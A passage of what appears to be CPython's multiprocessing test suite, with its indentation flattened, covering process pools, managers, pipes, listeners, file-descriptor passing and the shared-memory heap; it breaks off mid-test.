get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with warnings_helper.check_warnings(
('unclosed running multiprocessing pool', ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
# tests cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
@hashlib_helper.requires_hashdigest('md5')
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@hashlib_helper.requires_hashdigest('md5')
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
